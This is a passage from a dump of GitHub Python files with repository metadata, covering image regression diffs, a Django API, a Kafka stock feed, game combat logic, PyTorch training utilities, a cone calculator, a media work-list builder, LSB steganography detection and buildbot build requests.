high))","repo_name":"tanjingjing123/LeetcodeAlgorithms","sub_path":"sequentialDigits.py","file_name":"sequentialDigits.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43621148798","text":"import io\nfrom PIL import Image\nfrom PIL import ImageChops\n\nRESULT_PERFECT_MATCH = 1\nRESULT_MATCH_WITHIN_TOLERANCE = 2\nRESULT_REGRESSION_FOUND = 3\nRESULT_RUN_INCOMPLETE = 4\n\n_RESULT_NAMES = {\n RESULT_PERFECT_MATCH: \"RESULT_PERFECT_MATCH\",\n RESULT_REGRESSION_FOUND: \"RESULT_REGRESSION_FOUND\",\n RESULT_MATCH_WITHIN_TOLERANCE: \"RESULT_MATCH_WITHIN_TOLERANCE\",\n RESULT_RUN_INCOMPLETE: \"RESULT_RUN_INCOMPLETE\"\n}\n\n\ndef check_diff(baseline_img, test_img):\n diffimg = ImageChops.difference(baseline_img, test_img)\n dbytes = diffimg.tobytes() # Converted to RGB earlier, default is raw encoding with 3Bpp.\n diffcount = 0\n for i in range(diffimg.height * diffimg.width):\n r, g, b = dbytes[i * 3], dbytes[i * 3 + 1], dbytes[i * 3 + 2]\n if r + g + b != 0:\n diffcount += 1\n return diffcount\n\nclass VisualReport(object):\n \"\"\"A report of a single visual regression test case.\"\"\"\n def __init__(self, config, baseline_screenshot, test_screenshot):\n if baseline_screenshot is None or test_screenshot is None:\n self.result = RESULT_RUN_INCOMPLETE\n return\n bimg = Image.open(baseline_screenshot).convert('RGB')\n timg = Image.open(test_screenshot).convert('RGB')\n diffcount = check_diff(bimg, timg)\n self.diff_percentage = diffcount * 100.0 / bimg.width / bimg.height\n if self.diff_percentage == 0.0:\n self.result = RESULT_PERFECT_MATCH\n elif self.diff_percentage < config.environment.max_diff_percentage:\n self.result = RESULT_MATCH_WITHIN_TOLERANCE\n else:\n self.result = RESULT_REGRESSION_FOUND \n self.diff_percentage = diffcount * 100.0 / bimg.width / bimg.height\n \n def to_dict(self):\n return {\n \"result\": _RESULT_NAMES[self.result],\n \"diff_percentage\": \"%0.2f\" % self.diff_percentage\n }\n \n def __str__(self):\n return 
str(self.to_dict())\n","repo_name":"saisuman/viregtest","sub_path":"visual.py","file_name":"visual.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"71464332964","text":"from django.conf.urls import url\n\nfrom tastypie import fields\nfrom tastypie.authorization import Authorization\nfrom tastypie.resources import ModelResource, Resource, ALL, ALL_WITH_RELATIONS\n\nfrom ceeq.apps.queries.models import Project\nfrom ceeq.apps.calculator.models import ComponentImpact\n\n\nclass ComponentImpactResource(ModelResource):\n    class Meta:\n        queryset = ComponentImpact.objects.all()\n        resource_name = 'componentImpact'\n        authorization = Authorization()\n        allowed_methods = ['get', 'post', 'put', 'delete']\n\n\nclass SearchAutoCompleteResource(Resource):\n    def obj_get(self, bundle, **kwargs):\n        project_names = Project.objects.all().values_list('name', flat=True)\n        results = []\n        for name in project_names:\n            results.append(name)\n\n        results.sort()\n        return results\n\n    def dehydrate(self, bundle):\n        # for jquery autocomplete\n        if 'term' in bundle.request.GET:\n            term = bundle.request.GET['term']\n            filtered_results = []\n            for name in bundle.obj:\n                if name.startswith(term) or name.lower().startswith(term):\n                    filtered_results.append(name)\n            return filtered_results\n        else:\n            return bundle.obj\n\n    class Meta:\n        resource_name = 'searchAutoComplete'\n        authorization = Authorization()\n        allowed_methods = ['get']\n\n    def prepend_urls(self):\n        return [\n            url(r\"^(?P%s)/$\" % self._meta.resource_name, self.wrap_view('dispatch_detail'), name=\"api_dispatch_detail\"),\n        ]\n","repo_name":"jlpcri/ceeq","sub_path":"ceeq/api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"4443765527","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDescription: This script fetches the stock information from Alpha Vantage site using the TimeSeries API\n             The data is then sent as JSON records to Kafka topics. \nPrerequisites: Ensure Kafka brokers are running and the parameters passed correctly.\nUsage: python RetrieveStockDataToKafka.py --apikey  [--interval ] [--kafkabootstrapserver ] [--kafkatopic ] \n@author: Shyamal Akruvala\n\"\"\"\nfrom alpha_vantage.timeseries import TimeSeries\nimport time, json, argparse, sys, os\nimport pandas as pd\nfrom kafka import KafkaProducer\n\nparser = argparse.ArgumentParser(description='Stock Data Fetching Program')\nparser.add_argument('--apikey', dest='apikey', type=str, required=True, help='API Key from Alpha Vantage')\nparser.add_argument('--interval', dest='interval', type=int, required=False, help='Interval in seconds between API calls')\nparser.add_argument('--kafkabootstrapserver', dest='kafkabootstrapserver', type=str, required=False, help='Kafka Bootstrap Server details and port')\nparser.add_argument('--kafkatopic', dest='kafkatopic', type=str, required=False, help='Kafka topic to send the data')\n\nparser.set_defaults(interval=100, kafkabootstrapserver='localhost:9092', kafkatopic='stocks')\nargs = parser.parse_args()\n\n# Create a TimeSeries object to fetch data via API call. 
Please visit Alpha Vantage to get your API Key (https://www.alphavantage.co/support/#api-key)\n# Check documentation on https://alpha-vantage.readthedocs.io/en/latest/index.html to understand the various output_formats \nts = TimeSeries(key=args.apikey, output_format='pandas')\n\ndef fetchStockData(ticker):\n \"\"\"\n This method takes a string as an input and fetches data from Alpha Vantage site for the same ticker name\n e.g. MSFT for Microsoft\n \"\"\"\n data, meta_data = ts.get_intraday(symbol=ticker, interval='1min', outputsize='compact') # compact outputsize to get latest 100 records\n print(\"Data fetched for ticker:\" + ticker)\n data = data[:1] # Taking the first row only for analysis and processing\n data['ticker'] = ticker # adding the ticker details to the dataframe\n data = data.reset_index()\n data['date'] = (data['date'] - pd.Timestamp(\"1970-01-01\")) // pd.Timedelta('1s') # converting the datetime to epoch timestamp \n data = data.rename(columns = {'date':'timestamp',\n '1. open':'open',\n '2. high':'high',\n '3. low':'low',\n '4. close':'close',\n '5. volume':'volume'\n }) # renaming the columns for simplicity\n cols = ['ticker','timestamp','open','high','low','close','volume']\n data = data.reindex(columns=cols) # rearranging the columns\n #print(data)\n #return data.to_json(orient='columns', date_format='iso')\n return data.to_dict(orient='list')\n\n\nprint(\" _____ _ _ _____ _ _____ _ ______ _ _ \")\nprint(\" / ____| | | | | __ \\ (_) | __ \\ | | | ____| | | | | \")\nprint(\" | (___ | |_ ___ ___| | __ | |__) | __ _ ___ ___ | | | | __ _| |_ __ _ | |__ ___| |_ ___| |__ \")\nprint(\" \\___ \\| __/ _ \\ / __| |/ / | ___/ '__| |/ __/ _ \\ | | | |/ _` | __/ _` | | __/ _ \\ __/ __| '_ \\ \")\nprint(\" ____) | || (_) | (__| < | | | | | | (_| __/ | |__| | (_| | || (_| | | | | __/ || (__| | | |\")\nprint(\" |_____/ \\__\\___/ \\___|_|\\_\\ |_| |_| |_|\\___\\___| |_____/ \\__,_|\\__\\__,_| |_| \\___|\\__\\___|_| |_|\")\n \nif __name__ == \"__main__\":\n \"\"\"\n This is the main method.\n \"\"\"\n try:\n while True: # This constructs an infinite loop. The script will keep executing and fetching the stock data until interrupted.\n print(\"Retrieving stock information from site.....\")\n print(\"###########################################\")\n \n # Initialize the Kafka Producer\n kProducer = KafkaProducer(\n bootstrap_servers=[args.kafkabootstrapserver],\n value_serializer=lambda v: json.dumps(v).encode('utf-8'))\n\n # Below is the list of stock tickers for which stock information would be fetched.\n stockTickerList = ['CTSH', 'MSFT', 'GOOGL']\n \n for ticker in stockTickerList:\n stockInfoDF = fetchStockData(ticker)\n #print(stockInfoDF)\n for k,v in stockInfoDF.items():\n stockInfoDF[k] = str(stockInfoDF[k]).replace('[','').replace(']','').replace(\"'\",'') # remove brackets and quotes\n if stockInfoDF is not None:\n kProducer.send(args.kafkatopic, stockInfoDF)\n\n print(\"Script going to sleep for \" + str(args.interval) + \" seconds\")\n time.sleep(args.interval)\n print(\"###########################################\")\n except KeyboardInterrupt:\n print('''Program execution interrupted. 
Good Bye and have a nice day''')\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)","repo_name":"Shyamal002/PySpark_Kafka_Stock_Data_Analysis","sub_path":"RetrieveStockDataToKafka.py","file_name":"RetrieveStockDataToKafka.py","file_ext":"py","file_size_in_byte":5255,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"32759192601","text":"import pygame as pg\nimport numpy as np\nfrom src.combat.abilities import ALL_ABILITIES, ActiveAbility\nfrom src.combat.status_effects import BASE_CD, DOT_EFFECTS\n\nfrom math import sin, cos, atan2\n\nclass CombatSystem:\n def __init__(self, entities, camera):\n self.camera = camera\n self.entities = entities\n \n def update(self, entities, camera):\n self.camera = camera\n self.entities = entities\n self.status_effect_cds()\n self.active_abilities()\n self.collide()\n \n def use_ability(self, abl_input):\n a_i = abl_input['ability']\n index = abl_input['i']\n input_angle = abl_input['angle']\n # no input \n if a_i==-1:\n return\n \n # prevent spamming\n if 'ability_lock' in self.entities.status_effects[index]['effects']:\n return\n \n # entity is stunned cannot use abilities\n if 'stunned' in self.entities.status_effects[index]['effects']:\n return\n\n # all abilities\n queued_ability = a_i\n\n # abilities with movement tag\n if 'movement' in ALL_ABILITIES[queued_ability]['type']:\n # get the direction of the movement\n x_dir = cos(input_angle)\n y_dir = sin(input_angle)\n x_dir, y_dir = self.camera.screen_to_world(x_dir, y_dir)\n angle = atan2(y_dir, x_dir)\n spd_mod = 3+(self.entities.stats[index]['mbl']+self.entities.stats[index]['pwr'])/100\n self.entities.vel[index][0] = spd_mod*self.entities.spd[index]*cos(angle)\n self.entities.vel[index][1] = spd_mod*self.entities.spd[index]*sin(angle)\n\n # update the entity hurt box to deal damage\n movement_hurt_box = []\n for part in self.entities.creature[index].skeleton:\n movement_hurt_box.append([part[0], part[1], part[2]])\n \n self.entities.hurt_box[index] = ActiveAbility('movement', movement_hurt_box, \n ALL_ABILITIES[queued_ability]['modifiers'],\n 2*self.entities.creature[index].size)\n\n # consume energy to use ability\n energy_usage = 1/2*self.entities.creature[index].num_parts*(spd_mod*self.entities.spd[index])**2/1000\n self.entities.energy[index]-=energy_usage\n\n if 'strike' in ALL_ABILITIES[queued_ability]['type']:\n # get the strike direction\n x_dir = cos(input_angle)\n y_dir = sin(input_angle)\n x_dir, y_dir = self.camera.screen_to_world(x_dir, y_dir)\n angle = atan2(y_dir, x_dir)\n self.entities.vel[index][0] = self.entities.spd[index]*cos(angle)\n self.entities.vel[index][1] = self.entities.spd[index]*sin(angle)\n\n # update hurtboxes\n self.entities.hurt_box[index] = ActiveAbility('strike', [], \n ALL_ABILITIES[queued_ability]['modifiers'],\n 2*self.entities.creature[index].size)\n\n if 'aoe' in ALL_ABILITIES[queued_ability]['type']:\n self.aoe_collide(index, \n self.entities.entity_calculation(index, 'intimidation'),\n ALL_ABILITIES[queued_ability])\n \n toggled = []\n if 'toggle' in ALL_ABILITIES[queued_ability]['type']:\n for toggle in ALL_ABILITIES[queued_ability]['side_effects']:\n for j in range(len(self.entities.status_effects[index]['effects'])-1, -1, -1):\n if self.entities.status_effects[index]['effects'][j] == toggle:\n toggled.append(toggle)\n self.entities.status_effects[index]['effects'][j:j+1] = []\n self.entities.status_effects[index]['cd'][j:j+1] = []\n self.entities.status_effects[index]['time'][j:j+1] = 
[]\n self.entities.status_effects[index]['source'][j:j+1] = []\n\n\n for side_effect in ALL_ABILITIES[queued_ability]['side_effects']:\n if side_effect not in toggled:\n self.apply_status(index, index, side_effect, pg.time.get_ticks())\n\n def collide(self):\n for source in range(len(self.entities.hurt_box)):\n self.hurtbox_collide(source)\n \n def aoe_collide(self, source, aoe, ability):\n for target in range(len(self.entities.pos)):\n time = pg.time.get_ticks()\n if target!=source:\n dx = self.entities.pos[source][0]-self.entities.pos[target][0]\n dy = self.entities.pos[source][1]-self.entities.pos[target][1]\n if dx**2+dy**2<=aoe**2:\n for mod in ability['modifiers']:\n self.apply_status(source, target, mod, time)\n\n def hurtbox_collide(self, source):\n if self.entities.hurt_box[source]:\n time = pg.time.get_ticks()\n for target in range(len(self.entities.creature)):\n if source!=target and self.entities.creature[target].collide(self.entities.hurt_box[source].get_pos()):\n # decrease hp\n self.take_damage(target, 0)\n # apply modifiers\n for modifier in self.entities.hurt_box[source].modifiers:\n self.apply_status(source, target, modifier, time)\n # increase the target's aggression score against the attacker\n self.entities.behaviours[target].aggression[source]+=0.1\n\n def take_damage(self, target, dmg):\n self.entities.health[target] -= dmg \n\n def dot_status(self):\n for i in range(len(self.entities.status_effects)):\n for dot in DOT_EFFECTS:\n if dot in self.entities.status_effects[i]['effects']:\n self.take_damage(i, 0)\n print(f'{i} took dot damage')\n\n def apply_status(self, source, target, effect, time):\n if effect in self.entities.status_effects[target]['effects']:\n return\n self.entities.status_effects[target]['effects'].append(effect)\n self.entities.status_effects[target]['cd'].append(BASE_CD)\n self.entities.status_effects[target]['time'].append(time)\n self.entities.status_effects[target]['source'].append(source)\n \n def status_effect_cds(self):\n # entity loop\n for i in range(len(self.entities.status_effects)):\n if self.entities.status_effects[i]['effects']:\n # status loop\n num_effects = len(self.entities.status_effects[i]['effects'])\n for j in range(num_effects):\n effect = self.entities.status_effects[i]['effects'][0]\n cd = self.entities.status_effects[i]['cd'][0]\n time = self.entities.status_effects[i]['time'][0]\n source = self.entities.status_effects[i]['source'][0]\n\n self.entities.status_effects[i]['effects'][0:1] = []\n self.entities.status_effects[i]['cd'][0:1] = []\n self.entities.status_effects[i]['time'][0:1] = []\n self.entities.status_effects[i]['source'][0:1] = []\n if pg.time.get_ticks()-time= 0.\n mode paramater is ignored\n Default: None\n scale_mode (str): {'cycle', 'iterations'}.\n Defines whether scale_fn is evaluated on\n cycle number or cycle iterations (training\n iterations since start of cycle).\n Default: 'cycle'\n last_batch_iteration (int): The index of the last batch. Default: -1\n Example:\n >>> optimizer = torch.optim.SGD(model.parameters(), lr=0.1, momentum=0.9)\n >>> scheduler = torch.optim.CyclicLR(optimizer)\n >>> data_loader = torch.utils.data.DataLoader(...)\n >>> for epoch in range(10):\n >>> for batch in data_loader:\n >>> scheduler.batch_step()\n >>> train_batch(...)\n .. _Cyclical Learning Rates for Training Neural Networks: https://arxiv.org/abs/1506.01186\n .. 
_bckenstler/CLR: https://github.com/bckenstler/CLR\n \"\"\"\n\n def __init__(self, optimizer, base_lr=1e-3, max_lr=6e-3,\n step_size=2000, mode='triangular', gamma=1.,\n scale_fn=None, scale_mode='cycle', last_batch_iteration=-1):\n\n if not isinstance(optimizer, Optimizer):\n raise TypeError('{} is not an Optimizer'.format(\n type(optimizer).__name__))\n self.optimizer = optimizer\n\n if isinstance(base_lr, list) or isinstance(base_lr, tuple):\n if len(base_lr) != len(optimizer.param_groups):\n raise ValueError(\"expected {} base_lr, got {}\".format(\n len(optimizer.param_groups), len(base_lr)))\n self.base_lrs = list(base_lr)\n else:\n self.base_lrs = [base_lr] * len(optimizer.param_groups)\n\n if isinstance(max_lr, list) or isinstance(max_lr, tuple):\n if len(max_lr) != len(optimizer.param_groups):\n raise ValueError(\"expected {} max_lr, got {}\".format(\n len(optimizer.param_groups), len(max_lr)))\n self.max_lrs = list(max_lr)\n else:\n self.max_lrs = [max_lr] * len(optimizer.param_groups)\n\n self.step_size = step_size\n\n if mode not in ['triangular', 'triangular2', 'exp_range'] \\\n and scale_fn is None:\n raise ValueError('mode is invalid and scale_fn is None')\n\n self.mode = mode\n self.gamma = gamma\n\n if scale_fn is None:\n if self.mode == 'triangular':\n self.scale_fn = self._triangular_scale_fn\n self.scale_mode = 'cycle'\n elif self.mode == 'triangular2':\n self.scale_fn = self._triangular2_scale_fn\n self.scale_mode = 'cycle'\n elif self.mode == 'exp_range':\n self.scale_fn = self._exp_range_scale_fn\n self.scale_mode = 'iterations'\n else:\n self.scale_fn = scale_fn\n self.scale_mode = scale_mode\n\n self.batch_step(last_batch_iteration + 1)\n self.last_batch_iteration = last_batch_iteration\n\n def batch_step(self, batch_iteration=None):\n if batch_iteration is None:\n batch_iteration = self.last_batch_iteration + 1\n self.last_batch_iteration = batch_iteration\n for param_group, lr in zip(self.optimizer.param_groups, self.get_lr()):\n param_group['lr'] = lr\n\n def _triangular_scale_fn(self, x):\n return 1.\n\n def _triangular2_scale_fn(self, x):\n return 1 / (2. 
** (x - 1))\n\n def _exp_range_scale_fn(self, x):\n return self.gamma**(x)\n\n def get_lr(self):\n step_size = float(self.step_size)\n cycle = np.floor(1 + self.last_batch_iteration / (2 * step_size))\n x = np.abs(self.last_batch_iteration / step_size - 2 * cycle + 1)\n\n lrs = []\n param_lrs = zip(self.optimizer.param_groups, self.base_lrs, self.max_lrs)\n for param_group, base_lr, max_lr in param_lrs:\n base_height = (max_lr - base_lr) * np.maximum(0, (1 - x))\n if self.scale_mode == 'cycle':\n lr = base_lr + base_height * self.scale_fn(cycle)\n else:\n lr = base_lr + base_height * self.scale_fn(self.last_batch_iteration)\n lrs.append(lr)\n return lrs\n\ndef write_log(logfile, train_loss, test_loss, test_score, lr):\n with open(logfile, \"a+\") as log:\n log.write(\"{}\\t{}\\t{}\\t{}\\n\".format(train_loss, test_loss, test_score, lr))\n \n \n \ndef aug_train(p=1): \n return Compose([Resize(224, 224), \n HorizontalFlip(), \n VerticalFlip(), \n RandomRotate90(), \n Transpose(), \n ShiftScaleRotate(shift_limit=0.0625, scale_limit=0.50, rotate_limit=45, p=.75),\n OpticalDistortion(),\n GridDistortion(), \n RandomBrightnessContrast(p=0.3), \n RandomGamma(p=0.3), \n OneOf([HueSaturationValue(hue_shift_limit=20, sat_shift_limit=0.1, val_shift_limit=0.1, p=0.3), \n ChannelShuffle(p=0.3), CLAHE(p=0.3)])], p=p)\ndef aug_val(p=1):\n return Compose([\n Resize(224, 224)\n ], p=p)\n\n\nclass DataGenerator(data.Dataset):\n \"\"\"Generates dataset for loading.\n Args:\n ids: images ids\n labels: labels of images (1/0)\n augment: image augmentation from albumentations\n imdir: path tpo folder with images\n \"\"\"\n def __init__(self, ids, labels, augment, imdir):\n 'Initialization'\n self.ids, self.labels = ids, labels\n self.augment = augment\n self.imdir = imdir\n \n def __len__(self):\n return len(self.ids) \n\n def __getitem__(self, idx):\n imid = self.ids[idx]\n y = self.labels[idx]\n X = self.__load_image(imid)\n return X, np.expand_dims(y,0)\n\n def __load_image(self, imid):\n imid = imid+'.tif'\n im = imread(os.path.join(self.imdir, imid))\n if self.augment!=None:\n augmented = self.augment(image=im)\n im = augmented['image']\n im = im/255.0\n im = np.rollaxis(im, -1)\n return im \n \n \ndef make_tta(image):\n '''\n return 4 pictures - original, 3*90 rotations, mirror\n '''\n image_tta = np.zeros((4, image.shape[0], image.shape[1], 3))\n image_tta[0] = image\n aug = HorizontalFlip(p=1)\n image_aug = aug(image=image)['image']\n image_tta[1] = image_aug\n aug = VerticalFlip(p=1)\n image_aug = aug(image=image)['image']\n image_tta[2] = image_aug\n aug = Transpose(p=1)\n image_aug = aug(image=image)['image']\n image_tta[3] = image_aug \n image_tta = np.rollaxis(image_tta, -1, 1)\n return image_tta\ndef aug_train_heavy(p=1):\n return Compose([HorizontalFlip(), VerticalFlip(), RandomRotate90(), Transpose(), RandomBrightnessContrast(p=0.3), RandomGamma(p=0.3), OneOf([HueSaturationValue(hue_shift_limit=20, sat_shift_limit=0.1, val_shift_limit=0.1, p=0.3), ChannelShuffle(p=0.3)])], p=p)\nheavy_tta = aug_train_heavy()\n\ndef make_tta_heavy(image, n_images=12):\n image_tta = np.zeros((n_images, image.shape[0], image.shape[1], 3))\n image_tta[0] = image/255.0\n for i in range(1,n_images):\n image_aug = heavy_tta(image=image)['image']\n image_tta[i] = image_aug/255.0\n image_tta = np.rollaxis(image_tta, -1, 1)\n return image_tta 
","repo_name":"azkalot1/Histopathologic-Cancer-Detection","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":14633,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"42069247533","text":"def calculateSlantHeight(radius: int, height: int):\n slantHeight = (radius ** 2 + height ** 2) ** (1/2)\n return slantHeight\n\n\ndef calculateVolume(radius: int, height: int):\n volume = (22/7) * (radius ** 2) * (height / 3)\n return volume\n\n\ndef curvedSurfaceArea(radius: int, height: int):\n area = (22/7) * radius * calculateSlantHeight(radius, height)\n return area\n\n\ndef totalSurfaceArea(radius: int, height: int):\n area = curvedSurfaceArea(radius, height) + (22/7) * (radius ** 2)\n return area\n\n\nmenuMain = {\n 1: 'Calculate Slant Height(l) of the Cone',\n 2: 'Calculate Volume of the Cone',\n 3: 'Calculate Curved Surface Area (CSA) of Cone',\n 4: 'Calculate Total Surface Area (TSA) of Cone'\n}\n\nwhile True:\n for i in menuMain.keys():\n print('{}: {}'.format(i, menuMain[i]))\n radius = int(input('Please enter the radius of the Cone '))\n height = int(input('Please enter the height of the Cone (Unit must be same as radius) '))\n unit = input('Please enter the unit of both the quantity ')\n mainChoice = int(input('Please enter your choice '))\n if mainChoice == 1:\n print('Slant Height of the Cone is: {} {}'.format(calculateSlantHeight(radius, height), unit))\n elif mainChoice == 2:\n print('Volume of the Cone is: {}'.format(calculateVolume(radius, height), unit))\n elif mainChoice == 3:\n print('CSA of the Cone is: {}'.format(curvedSurfaceArea(radius, height), unit))\n elif mainChoice == 4:\n print('TSA of the Cone is: {}'.format(totalSurfaceArea(radius, height), unit))\n userConfirmation = input('Do you want to continue (Y/N) ')\n if userConfirmation.lower == 'y':\n continue\n else:\n break\n","repo_name":"sarthakpriyadarshi/repository_python","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28038266810","text":"\"\"\" Makes a work list given contents of an extracted tarball/zip \"\"\"\n\nimport os\nimport argparse\nimport json\nimport subprocess\nimport hashlib\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\"directory\")\n args = parser.parse_args()\n\n # This actually gets images + videos\n videos = []\n images = []\n state_files = []\n localization_files = []\n\n for root, dirs, files in os.walk(args.directory):\n for fp in files:\n path = os.path.join(root,fp)\n cmd = [\n \"ffprobe\",\n \"-v\",\"error\",\n \"-show_entries\", \"stream\",\n \"-print_format\", \"json\",\n \"-select_streams\", \"v\",\n path,\n ]\n try:\n output = subprocess.run(cmd,\n stdout=subprocess.PIPE,\n check=True).stdout\n video_info = json.loads(output)\n print(video_info)\n for idx, stream in enumerate(video_info[\"streams\"]):\n if stream[\"codec_type\"] == \"video\":\n codec_name = stream[\"codec_name\"]\n print(f\"codec_name = {codec_name}\")\n # TODO: Determine a better way to know image vs. 
video?\n if codec_name == \"png\" or codec_name == \"mjpeg\":\n images.append(path)\n print(f\"Adding image {path}\")\n break\n else:\n print(f\"Adding video {path}\")\n videos.append(path)\n break\n except:\n pass\n\n md5_lookup={}\n\n def make_workflow_video(video):\n # Calculate md5\n md5 = md5_lookup[video]\n\n base = os.path.splitext(video)[0]\n # This is the arguments for each iteration of the transcode DAG\n paths = {\n 'dirname': os.path.dirname(video),\n 'base': os.path.basename(base),\n 'entity_type': '-1', # Have server auto compute this\n 'name': os.path.basename(video),\n 'md5': md5\n }\n return paths\n\n def make_workflow_image(image):\n # Calculate md5\n md5 = md5_lookup[image]\n\n base = os.path.splitext(image)[0]\n # This is the arguments for each iteration of the transcode DAG\n paths = {\n 'url': 'None',\n 'original': image,\n 'entity_type': '-1', # Have server auto compute this\n 'name': os.path.basename(image),\n 'md5': md5\n }\n return paths\n\n def states_for_media(media):\n base = os.path.splitext(media)[0]\n l = []\n for root, dirs, files in os.walk(os.path.join(args.directory,\n base,\n \"states\")):\n for fp in files:\n if os.path.splitext(fp)[-1].lower() == \".csv\":\n state_files.append({\"md5\": md5_lookup[media],\n \"file\": os.path.join(root,fp)})\n return l\n\n def localizations_for_media(media):\n base = os.path.splitext(media)[0]\n l=[]\n for root, dirs, files in os.walk(os.path.join(args.directory,\n base,\n \"localizations\")):\n for fp in files:\n if os.path.splitext(fp)[-1].lower() == \".csv\":\n l.append({\"md5\": md5_lookup[media],\n \"file\": os.path.join(root,fp)})\n return l\n\n\n # Pre-calculate hash of videos + images\n for media in [*videos, *images]:\n with open(media,'rb') as fp:\n data = fp.read()\n md5_lookup[media] = hashlib.md5(data).hexdigest()\n state_files.extend(states_for_media(media))\n localization_files.extend(localizations_for_media(media))\n\n # Remove media that is corrupt prior to trying to transcode\n def is_valid(media):\n # Check to make sure the image/video is not corrupt\n cmd = [\n \"ffprobe\",\n \"-v\",\"error\",\n \"-show_entries\", \"stream\",\n \"-print_format\", \"json\",\n \"-select_streams\", \"v\",\n \"{}\".format(media),\n ]\n status = subprocess.run(cmd).returncode\n if status != 0:\n print(f\"Removing {media} from worklist due to video corruption\")\n return False\n else:\n print(f\"Adding {media} to worklist\")\n return True\n\n print(f\"Putting jsons into {args.directory}\")\n def split_list_into_k8s_chunks(data, name):\n MAX_NUM_WORK_FILES=20\n MAX_FILE_SIZE=220000\n work_packets=['' for x in range(MAX_NUM_WORK_FILES)]\n temp_list=[]\n work_packet=0\n\n # Initialize empty files just incase\n for x in range(MAX_NUM_WORK_FILES):\n print(f'Attempting to save {os.path.join(args.directory, f\"{name}_{work_packet}.json\")}')\n with open(os.path.join(args.directory, f\"{name}_{x}.json\"), 'w') as packet_file:\n json.dump(temp_list, packet_file)\n\n # Iterate through each data and figure out how to break it up into ~220Kb chunks\n for x in data:\n temp_list.append(x)\n json_str = json.dumps(temp_list)\n if len(json_str) > MAX_FILE_SIZE:\n temp_list.pop()\n with open(os.path.join(args.directory, f\"{name}_{work_packet}.json\"), 'w') as packet_file:\n print(f\"temp_list = {temp_list}\")\n json.dump(temp_list, packet_file)\n temp_list = [x]\n work_packet += 1\n if len(temp_list) > 0:\n print(f\"temp_list = {temp_list}\")\n with open(os.path.join(args.directory, f\"{name}_{work_packet}.json\"), 'w') as packet_file:\n 
json.dump(temp_list, packet_file)\n\n # Initialize all the work files first\n work=[make_workflow_video(vid) for vid in videos if is_valid(vid)]\n split_list_into_k8s_chunks(work,\"videos\")\n\n # don't split images into work packets\n work=[make_workflow_video(img) for img in images if is_valid(img)]\n with open(os.path.join(args.directory, f\"images.json\"), 'w') as packet_file:\n json.dump(work, packet_file)\n\n split_list_into_k8s_chunks(localization_files,\"localizations\")\n\n split_list_into_k8s_chunks(state_files, \"states\")\n","repo_name":"cvisionai/tator","sub_path":"scripts/transcoder/makeWorkList.py","file_name":"makeWorkList.py","file_ext":"py","file_size_in_byte":6662,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"52"} +{"seq_id":"26894852714","text":"import sys\r\n\r\nimport imageio as iio\r\nimport matplotlib.pyplot as plt\r\n\r\nimport utils\r\n\r\nif __name__ == \"__main__\":\r\n if len(sys.argv) > 1:\r\n target = sys.argv[1]\r\n else:\r\n target = 'sampleImages/hide_image.png'\r\n img = iio.imread(target)\r\n utils.magnify_LSB(img).show()\r\n utils.get_LSB_histogram(img)\r\n plt.show()\r\n\r\ndef grab_hist(target, savename):\r\n img = iio.imread(target)\r\n hist = utils.get_LSB_histogram(img)\r\n\r\n utils.save(hist, savename)\r\n\r\ndef grab_magnified(target, savename):\r\n img = iio.imread(target)\r\n magnified = utils.magnify_LSB(img)\r\n\r\n utils.save(magnified, savename)\r\n","repo_name":"cjense/COSC-383","sub_path":"P4/detect_steg.py","file_name":"detect_steg.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13056007746","text":"import calendar\n\nfrom buildbot import interfaces\nfrom buildbot import sourcestamp\nfrom buildbot.db import buildrequests\nfrom buildbot.process import properties\nfrom buildbot.status.results import FAILURE\nfrom twisted.internet import defer\nfrom twisted.python import log\nfrom zope.interface import implements\n\n\nclass BuildRequest(object):\n\n \"\"\"\n\n A rolled-up encapsulation of all of the data relevant to a build request.\n\n This class is used by the C{nextBuild} and C{mergeRequests} configuration\n parameters, as well as in starting a build. Construction of a BuildRequest\n object is a heavyweight process involving a lot of database queries, so\n it should be avoided where possible. See bug #1894.\n\n Build requests have a SourceStamp which specifies what sources to build.\n This may specify a specific revision of the source tree (so source.branch,\n source.revision, and source.patch are used). The .patch attribute is either\n None or a tuple of (patchlevel, diff), consisting of a number to use in\n 'patch -pN', and a unified-format context diff.\n\n Alternatively, the SourceStamp may specify a set of Changes to be built,\n contained in source.changes. In this case, the requeset may be mergeable\n with other BuildRequests on the same branch.\n\n @type source: L{buildbot.sourcestamp.SourceStamp}\n @ivar source: the source stamp that this BuildRequest use\n\n @type reason: string\n @ivar reason: the reason this Build is being requested. Schedulers provide\n this, but for forced builds the user requesting the build will provide a\n string. 
It comes from the buildsets table.\n\n    @type properties: L{properties.Properties}\n    @ivar properties: properties that should be applied to this build, taken\n    from the buildset containing this build request\n\n    @ivar submittedAt: a timestamp (seconds since epoch) when this request was\n    submitted to the Builder. This is used by the CVS step to compute a\n    checkout timestamp, as well as by the master to prioritize build requests\n    from oldest to newest.\n\n    @ivar buildername: name of the requested builder\n\n    @ivar priority: request priority\n\n    @ivar id: build request ID\n\n    @ivar bsid: ID of the parent buildset\n    \"\"\"\n\n    source = None\n    sources = None\n    submittedAt = None\n\n    @classmethod\n    def fromBrdict(cls, master, brdict):\n        \"\"\"\n        Construct a new L{BuildRequest} from a dictionary as returned by\n        L{BuildRequestsConnectorComponent.getBuildRequest}.\n\n        This method uses a cache, which may result in return of stale objects;\n        for the most up-to-date information, use the database connector\n        methods.\n\n        @param master: current 